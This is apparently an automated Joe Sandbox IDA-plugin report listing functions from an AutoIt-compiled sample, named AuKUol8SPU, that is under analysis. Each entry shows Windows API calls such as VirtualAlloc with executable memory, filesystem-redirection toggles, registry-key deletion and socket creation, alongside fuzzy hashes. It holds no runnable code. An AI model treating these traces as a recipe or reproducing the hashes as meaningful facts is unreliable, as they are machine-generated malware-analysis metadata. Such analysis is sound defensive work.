Associated: 00000000.00000002.1375877563.0000000000BD7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b10000_AuKUol8SPU.jbxd

Similarity

API ID: MessageSend
String ID: msctls_trackbar32
API String ID: 3850602802-1010561917
Opcode ID: 7ff1e7aa1fce506806809bab42c40e80bd5e4d330a52bdd70486b0c47924986f
Instruction ID: ec9278f9252721f1d5696542b379caff3dc1f36836446692f2fcbca641f7d102
Opcode Fuzzy Hash: 7ff1e7aa1fce506806809bab42c40e80bd5e4d330a52bdd70486b0c47924986f
Instruction Fuzzy Hash: 1A113A72250208BFEF245FA4CC05FE777E8EF88B54F124168FA4192090CA71EC11CB10

Function 00B96920 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 64windowCOMMON

Download Yara Rule

APIs

GetWindowTextLengthW.USER32(00000000), ref: 00B969A2
SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 00B969B1

Strings

@U=u, xrefs: 00B969B1
edit, xrefs: 00B96986

Memory Dump Source

Source File: 00000000.00000002.1375557670.0000000000B11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000000.00000002.1375538517.0000000000B10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375664130.0000000000B9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375664130.0000000000BC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375797120.0000000000BCE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375877563.0000000000BD7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b10000_AuKUol8SPU.jbxd

Similarity

API ID: LengthMessageSendTextWindow
String ID: @U=u$edit
API String ID: 2978978980-590756393
Opcode ID: 3629edaf3dacacbdb3fc87cda20a8b8c059561dfecb5c49a5ac9f616efea3194
Instruction ID: 3ad02855fe26ed880b96c50034979936e591de8999255683e22f8db12565b319
Opcode Fuzzy Hash: 3629edaf3dacacbdb3fc87cda20a8b8c059561dfecb5c49a5ac9f616efea3194
Instruction Fuzzy Hash: 5C116A71100209ABEF108F649C84EFB3BA9EB193B8F604774F9A5971E0CA35DC90A760

Function 00B68E05 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 52windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00B17DE1: _memmove.LIBCMT ref: 00B17E22

Part of subcall function 00B6AA99: GetClassNameW.USER32(?,?,000000FF), ref: 00B6AABC

SendMessageW.USER32(?,000001A2,000000FF,?), ref: 00B68E73

Strings

ComboBox, xrefs: 00B68E12
@U=u, xrefs: 00B68E73
ListBox, xrefs: 00B68E3D

Memory Dump Source

Source File: 00000000.00000002.1375557670.0000000000B11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000000.00000002.1375538517.0000000000B10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375664130.0000000000B9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375664130.0000000000BC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375797120.0000000000BCE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375877563.0000000000BD7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b10000_AuKUol8SPU.jbxd

Similarity

API ID: ClassMessageNameSend_memmove
String ID: @U=u$ComboBox$ListBox
API String ID: 372448540-2258501812
Opcode ID: 7813a9a43c0979d36b98f6bbbc1aab71374f85b367675d2862697aef727cb3cb
Instruction ID: 97bc939911a9bbd67e78d58591ba8ec861bd1e31113cf53c262176be69f3b8e0
Opcode Fuzzy Hash: 7813a9a43c0979d36b98f6bbbc1aab71374f85b367675d2862697aef727cb3cb
Instruction Fuzzy Hash: D90128B1641219ABCF14EBA0CC81DFE73E8EF01320B4007A9F831672E1DE355808C660

Function 00B68CFD Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 50windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00B17DE1: _memmove.LIBCMT ref: 00B17E22

Part of subcall function 00B6AA99: GetClassNameW.USER32(?,?,000000FF), ref: 00B6AABC

SendMessageW.USER32(?,00000180,00000000,?), ref: 00B68D6B

Strings

ComboBox, xrefs: 00B68D0A
@U=u, xrefs: 00B68D6B
ListBox, xrefs: 00B68D35

Memory Dump Source

Source File: 00000000.00000002.1375557670.0000000000B11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000000.00000002.1375538517.0000000000B10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375664130.0000000000B9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375664130.0000000000BC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375797120.0000000000BCE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375877563.0000000000BD7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b10000_AuKUol8SPU.jbxd

Similarity

API ID: ClassMessageNameSend_memmove
String ID: @U=u$ComboBox$ListBox
API String ID: 372448540-2258501812
Opcode ID: 79bf7b53e9e81bf687d411b4e310f8e76ae97f4cb16ca14714613ecc9ea04eaa
Instruction ID: 306b52782cdf5a3c97bb2baece69d9f9cd24d110ca325ad0fa18835ca047d799
Opcode Fuzzy Hash: 79bf7b53e9e81bf687d411b4e310f8e76ae97f4cb16ca14714613ecc9ea04eaa
Instruction Fuzzy Hash: 2901D4B1A81109ABCF14EBE0C992EFE73E8DF15340F5001BAB911632E1DE145E08D671

Function 00B68D82 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 49windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00B17DE1: _memmove.LIBCMT ref: 00B17E22

Part of subcall function 00B6AA99: GetClassNameW.USER32(?,?,000000FF), ref: 00B6AABC

SendMessageW.USER32(?,00000182,?,00000000), ref: 00B68DEE

Strings

ComboBox, xrefs: 00B68D8F
@U=u, xrefs: 00B68DEE
ListBox, xrefs: 00B68DBA

Memory Dump Source

Source File: 00000000.00000002.1375557670.0000000000B11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000000.00000002.1375538517.0000000000B10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375664130.0000000000B9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375664130.0000000000BC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375797120.0000000000BCE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375877563.0000000000BD7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b10000_AuKUol8SPU.jbxd

Similarity

API ID: ClassMessageNameSend_memmove
String ID: @U=u$ComboBox$ListBox
API String ID: 372448540-2258501812
Opcode ID: 2e381713f6a1e2c3e31a56990832e9d42ca83fe53431278118baeaf4ddc2de61
Instruction ID: 2fdad2d3d7b442f82367844eedad9bdeed3a8e870bbe422aad38b0c5fe191162
Opcode Fuzzy Hash: 2e381713f6a1e2c3e31a56990832e9d42ca83fe53431278118baeaf4ddc2de61
Instruction Fuzzy Hash: BE01A7B1A41109ABDF11E7A4C986EFE77ECDF11350F5001AAB905B32D1DE154E08D671

Function 00B9ACCF Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 45windowCOMMON

Download Yara Rule

APIs

GetForegroundWindow.USER32(?,00BD57B0,00B9D809,000000FC,?,00000000,00000000,?,?,?,00B4B969,?,?,?,?,?), ref: 00B9ACD1
GetFocus.USER32 ref: 00B9ACD9

Part of subcall function 00B12612: GetWindowLongW.USER32(?,000000EB), ref: 00B12623

Part of subcall function 00B125DB: GetWindowLongW.USER32(?,000000EB), ref: 00B125EC

SendMessageW.USER32(0170E0F8,000000B0,000001BC,000001C0), ref: 00B9AD4B

Strings

@U=u, xrefs: 00B9AD4B

Memory Dump Source

Source File: 00000000.00000002.1375557670.0000000000B11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000000.00000002.1375538517.0000000000B10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375664130.0000000000B9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375664130.0000000000BC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375797120.0000000000BCE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375877563.0000000000BD7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b10000_AuKUol8SPU.jbxd

Similarity

API ID: Window$Long$FocusForegroundMessageSend
String ID: @U=u
API String ID: 3601265619-2594219639
Opcode ID: 91b06696a6fb221b944efe988f5a1e3a34c6d7724856a16b8fe55fc0f5b8e2ed
Instruction ID: 302a58c6cf69f1ddf31236780682c47a950d5d1cbaae8e627281178a931a9fa5
Opcode Fuzzy Hash: 91b06696a6fb221b944efe988f5a1e3a34c6d7724856a16b8fe55fc0f5b8e2ed
Instruction Fuzzy Hash: BD0152312016009FCB249B28D898AA577E6EF8A325B1802BAF415C72B5DF31AC56CB91

Function 00B26063 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 31windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00B2603A: SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,?), ref: 00B26051

SendMessageW.USER32(?,0000000C,00000000,?), ref: 00B2607F
GetParent.USER32(?), ref: 00B60D46
InvalidateRect.USER32(00000000,?,00B23A4F,?,00000000,00000001), ref: 00B60D4D

Strings

@U=u, xrefs: 00B2607F

Memory Dump Source

Source File: 00000000.00000002.1375557670.0000000000B11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000000.00000002.1375538517.0000000000B10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375664130.0000000000B9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375664130.0000000000BC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375797120.0000000000BCE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375877563.0000000000BD7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b10000_AuKUol8SPU.jbxd

Similarity

API ID: MessageSend$InvalidateParentRectTimeout
String ID: @U=u
API String ID: 3648793173-2594219639
Opcode ID: f79cfed4a00ae3a8a4b89e64645d4bdf1da93c89c54575fd2ec1fd134ae30659
Instruction ID: 055a19802995f7c89ae6eb3a6d4bd54431d9b2821f630f90f2187b3fa8967151
Opcode Fuzzy Hash: f79cfed4a00ae3a8a4b89e64645d4bdf1da93c89c54575fd2ec1fd134ae30659
Instruction Fuzzy Hash: BBF03031101314FBEF212F61EC89FA67BD9EB15B94F2444A9F5489B0A1CAB26851FB50

Function 00B14C36 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(kernel32.dll,?,00B14B83,?), ref: 00B14C44
GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 00B14C56

Strings

kernel32.dll, xrefs: 00B14C3F
Wow64RevertWow64FsRedirection, xrefs: 00B14C50

Memory Dump Source

Source File: 00000000.00000002.1375557670.0000000000B11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000000.00000002.1375538517.0000000000B10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375664130.0000000000B9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375664130.0000000000BC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375797120.0000000000BCE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375877563.0000000000BD7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b10000_AuKUol8SPU.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: Wow64RevertWow64FsRedirection$kernel32.dll
API String ID: 2574300362-1355242751
Opcode ID: 6908f0f48725646bafcdede2cd07727cb2dbf184ee9828fc32e9307de8d1612a
Instruction ID: c697eccd6a9a40cc8d6c61b5139c128261c7ffe657352fa71b5810ba7b6549d8
Opcode Fuzzy Hash: 6908f0f48725646bafcdede2cd07727cb2dbf184ee9828fc32e9307de8d1612a
Instruction Fuzzy Hash: B3D01230610723CFD7205F31D91975676D4EF06361B51C87E9495DA170EB70D4C0C690

Function 00B14C03 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(kernel32.dll,?,00B14BD0,?,00B14DEF,?,00BD52F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00B14C11
GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 00B14C23

Strings

kernel32.dll, xrefs: 00B14C0C
Wow64DisableWow64FsRedirection, xrefs: 00B14C1D

Memory Dump Source

Source File: 00000000.00000002.1375557670.0000000000B11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000000.00000002.1375538517.0000000000B10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375664130.0000000000B9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375664130.0000000000BC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375797120.0000000000BCE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375877563.0000000000BD7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b10000_AuKUol8SPU.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: Wow64DisableWow64FsRedirection$kernel32.dll
API String ID: 2574300362-3689287502
Opcode ID: f4847b6e928d97515e5f7edc4913f0aa951682e6e306c6da4160279e2ecba95d
Instruction ID: 82941ab57fdb955fcfb310af406a06fe18434d7578cbccfbfb22b6f6e48645b1
Opcode Fuzzy Hash: f4847b6e928d97515e5f7edc4913f0aa951682e6e306c6da4160279e2ecba95d
Instruction Fuzzy Hash: B4D01230511723CFD7205FB5D908B56B6D5EF09362B51CC7E9485D6160EBB0D4C0C690

Function 00B90DE7 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(advapi32.dll,?,00B91039), ref: 00B90DF5
GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 00B90E07

Strings

advapi32.dll, xrefs: 00B90DF0
RegDeleteKeyExW, xrefs: 00B90E01

Memory Dump Source

Source File: 00000000.00000002.1375557670.0000000000B11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000000.00000002.1375538517.0000000000B10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375664130.0000000000B9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375664130.0000000000BC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375797120.0000000000BCE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375877563.0000000000BD7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b10000_AuKUol8SPU.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: RegDeleteKeyExW$advapi32.dll
API String ID: 2574300362-4033151799
Opcode ID: 668333a5c86c209e1a3f8fd26b428e4073e1955ef6c58aace191518b06ed4d2c
Instruction ID: 86b99da1907f654eb1cb6e10f1487636c5f871ba0621de5e6665f10b738258c3
Opcode Fuzzy Hash: 668333a5c86c209e1a3f8fd26b428e4073e1955ef6c58aace191518b06ed4d2c
Instruction Fuzzy Hash: B7D01270910723CFD7205F75D90875676D5EF14351F11CCBE9485D2160DBB0D890C650

Function 00B890E0 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(kernel32.dll,00000001,00B88CF4,?,00B9F910), ref: 00B890EE
GetProcAddress.KERNEL32(00000000,GetModuleHandleExW), ref: 00B89100

Strings

kernel32.dll, xrefs: 00B890E9
GetModuleHandleExW, xrefs: 00B890FA

Memory Dump Source

Source File: 00000000.00000002.1375557670.0000000000B11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000000.00000002.1375538517.0000000000B10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375664130.0000000000B9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375664130.0000000000BC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375797120.0000000000BCE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375877563.0000000000BD7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b10000_AuKUol8SPU.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: GetModuleHandleExW$kernel32.dll
API String ID: 2574300362-199464113
Opcode ID: df2c187067550c258720e0037298aca32baed0bb0cc96f97f16cf249c32d347e
Instruction ID: 88ede6fd1a8e79152aa1ab6bcdc807ce541b5ca9938d41f0379cf71fb701f091
Opcode Fuzzy Hash: df2c187067550c258720e0037298aca32baed0bb0cc96f97f16cf249c32d347e
Instruction Fuzzy Hash: 36D01734614723DFEB20AF31D91D62676E5EF05361B16CCBE9486E65B0EB70C880CB90

Function 00B51714 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 17timeCOMMON

Download Yara Rule

APIs

GetLocalTime.KERNEL32(?), ref: 00B51718
__swprintf.LIBCMT ref: 00B51749

Strings

WIN_XPe, xrefs: 00B51788
%.3d, xrefs: 00B51723

Memory Dump Source

Source File: 00000000.00000002.1375557670.0000000000B11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000000.00000002.1375538517.0000000000B10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375664130.0000000000B9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375664130.0000000000BC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375797120.0000000000BCE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375877563.0000000000BD7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b10000_AuKUol8SPU.jbxd

Similarity

API ID: LocalTime__swprintf
String ID: %.3d$WIN_XPe
API String ID: 2070861257-2409531811
Opcode ID: 04a27b355ae26a9a70a89356484edfda86f7b87b575d7994d2e08c1d1e736d43
Instruction ID: 916076433e7fa639b5360fd89fe4403b98b18cc6ba5968ac4ce7aadc6196dfc9
Opcode Fuzzy Hash: 04a27b355ae26a9a70a89356484edfda86f7b87b575d7994d2e08c1d1e736d43
Instruction Fuzzy Hash: D1D012B1844109FAC700979898C9FF977FCA70C312F5418D2B806E2040E6618F98D621

Function 00B6717D Relevance: 6.3, APIs: 4, Instructions: 333COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1375557670.0000000000B11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000000.00000002.1375538517.0000000000B10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375664130.0000000000B9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375664130.0000000000BC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375797120.0000000000BCE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375877563.0000000000BD7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b10000_AuKUol8SPU.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: dbcf4fd9a7702e4906c42eb8985e575fb9be766fa83a2a3d8a7ffec5a0a4f12a
Instruction ID: 299a3d93f9ba2299dc5b1653bb3668e3edc581579680f483ac284b74994e296b
Opcode Fuzzy Hash: dbcf4fd9a7702e4906c42eb8985e575fb9be766fa83a2a3d8a7ffec5a0a4f12a
Instruction Fuzzy Hash: C1C13B75A04216EFCB14CFA4C888AAEBBF5FF48718B158598E805DB351DB34DD81DB90

Function 00B8E02A Relevance: 6.3, APIs: 4, Instructions: 307memoryCOMMON

Download Yara Rule

APIs

CharLowerBuffW.USER32(?,?), ref: 00B8E0BE
CharLowerBuffW.USER32(?,?), ref: 00B8E101

Part of subcall function 00B8D7A5: CharLowerBuffW.USER32(?,?,?,?,00000000,?,?), ref: 00B8D7C5

VirtualAlloc.KERNEL32(00000000,00000077,00003000,00000040), ref: 00B8E301
_memmove.LIBCMT ref: 00B8E314

Memory Dump Source

Source File: 00000000.00000002.1375557670.0000000000B11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000000.00000002.1375538517.0000000000B10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375664130.0000000000B9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375664130.0000000000BC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375797120.0000000000BCE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375877563.0000000000BD7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b10000_AuKUol8SPU.jbxd

Similarity

API ID: BuffCharLower$AllocVirtual_memmove
String ID:
API String ID: 3659485706-0
Opcode ID: 8bba0f57fa718846b919de9f3c86f3bd9e75c7ba1b9b841e2c069ccc31d8fa8f
Instruction ID: c6a945eca3b9deb8270b5d14ca3ce71ae2160f3c1d52297940d51331e33ff0be
Opcode Fuzzy Hash: 8bba0f57fa718846b919de9f3c86f3bd9e75c7ba1b9b841e2c069ccc31d8fa8f
Instruction Fuzzy Hash: 70C13B71608301DFC714EF28C49096ABBE4FF89754F1489AEF8A99B361D731E945CB82

Function 00B88093 Relevance: 6.3, APIs: 4, Instructions: 267COMMON

Download Yara Rule

APIs

CoInitialize.OLE32(00000000), ref: 00B880C3
CoUninitialize.OLE32 ref: 00B880CE

Part of subcall function 00B6D56C: CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 00B6D5D4

VariantInit.OLEAUT32(?), ref: 00B880D9
VariantClear.OLEAUT32(?), ref: 00B883AA

Memory Dump Source

Source File: 00000000.00000002.1375557670.0000000000B11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000000.00000002.1375538517.0000000000B10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375664130.0000000000B9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375664130.0000000000BC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375797120.0000000000BCE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375877563.0000000000BD7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b10000_AuKUol8SPU.jbxd

Similarity

API ID: Variant$ClearCreateInitInitializeInstanceUninitialize
String ID:
API String ID: 780911581-0
Opcode ID: 51c870b54c44ae10dcd4d0eb4b8f0a206cba593384de9a2d99a7b45952ea48f2
Instruction ID: 9f43826302e0b5f1784123befb8be7b1993ab3487287b44070a76e3b9ad77071
Opcode Fuzzy Hash: 51c870b54c44ae10dcd4d0eb4b8f0a206cba593384de9a2d99a7b45952ea48f2
Instruction Fuzzy Hash: 95A18B356047419FCB00EF14C491B6AB7E4FF89364F844498F9969B3A1CB30EE41CB86

Function 00B67530 Relevance: 6.2, APIs: 4, Instructions: 231COMMON

Download Yara Rule

APIs

ProgIDFromCLSID.OLE32(?,00000000,?,00000000,00000800,00000000,?,00BA2C7C,?), ref: 00B676EA
CoTaskMemFree.OLE32(00000000,00000000,?,00000000,00000800,00000000,?,00BA2C7C,?), ref: 00B67702
CLSIDFromProgID.OLE32(?,?,00000000,00B9FB80,000000FF,?,00000000,00000800,00000000,?,00BA2C7C,?), ref: 00B67727
_memcmp.LIBCMT ref: 00B67748

Memory Dump Source

Source File: 00000000.00000002.1375557670.0000000000B11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000000.00000002.1375538517.0000000000B10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375664130.0000000000B9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375664130.0000000000BC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375797120.0000000000BCE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375877563.0000000000BD7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b10000_AuKUol8SPU.jbxd

Similarity

API ID: FromProg$FreeTask_memcmp
String ID:
API String ID: 314563124-0
Opcode ID: 83918a873bb2e2b846c657ee7dc2a727d44c9cb214bf27d62fbf911e2ff9f706
Instruction ID: aca408edb563d1c97043d11ef490dc2f934ebdbbba39e43567e5517eb4f8499b
Opcode Fuzzy Hash: 83918a873bb2e2b846c657ee7dc2a727d44c9cb214bf27d62fbf911e2ff9f706
Instruction Fuzzy Hash: 2D81FB75A00109EFCB04DFA4C984EEEB7F9FF89315F204598E506AB250DB75AE46CB60

Function 00B6687D Relevance: 6.2, APIs: 4, Instructions: 202memoryCOMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 00B6688E
SysAllocString.OLEAUT32(00000000), ref: 00B66937
VariantCopy.OLEAUT32 ref: 00B66966
VariantClear.OLEAUT32(?), ref: 00B6698D

Memory Dump Source

Source File: 00000000.00000002.1375557670.0000000000B11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000000.00000002.1375538517.0000000000B10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375664130.0000000000B9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375664130.0000000000BC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375797120.0000000000BCE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375877563.0000000000BD7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b10000_AuKUol8SPU.jbxd

Similarity

API ID: Variant$AllocClearCopyInitString
String ID:
API String ID: 2808897238-0
Opcode ID: f65ee2989d19529bb11d1b8b012cc44cb4c44e2ecc4035335525ee2e5915024e
Instruction ID: c65466d230132b185d71e7f0fe9e75e7b0c05dfd8b079f304af768b70ce6126e
Opcode Fuzzy Hash: f65ee2989d19529bb11d1b8b012cc44cb4c44e2ecc4035335525ee2e5915024e
Instruction Fuzzy Hash: F151A7747143019ADF24AFA5D89167EB3E5EF49310F20D8AFE596DB291DF78D8808B01

Function 00B869AA Relevance: 6.1, APIs: 4, Instructions: 127networkCOMMON

Download Yara Rule

APIs

socket.WSOCK32(00000002,00000002,00000011), ref: 00B869D1
WSAGetLastError.WSOCK32(00000000), ref: 00B869E1

Part of subcall function 00B19837: __itow.LIBCMT ref: 00B19862
Part of subcall function 00B19837: __swprintf.LIBCMT ref: 00B198AC

#21.WSOCK32(?,0000FFFF,00000020,00000002,00000004), ref: 00B86A45
WSAGetLastError.WSOCK32(00000000), ref: 00B86A51

Memory Dump Source

Source File: 00000000.00000002.1375557670.0000000000B11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000000.00000002.1375538517.0000000000B10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375664130.0000000000B9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375664130.0000000000BC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375797120.0000000000BCE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375877563.0000000000BD7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b10000_AuKUol8SPU.jbxd

Similarity

API ID: ErrorLast$__itow__swprintfsocket
String ID:
API String ID: 2214342067-0
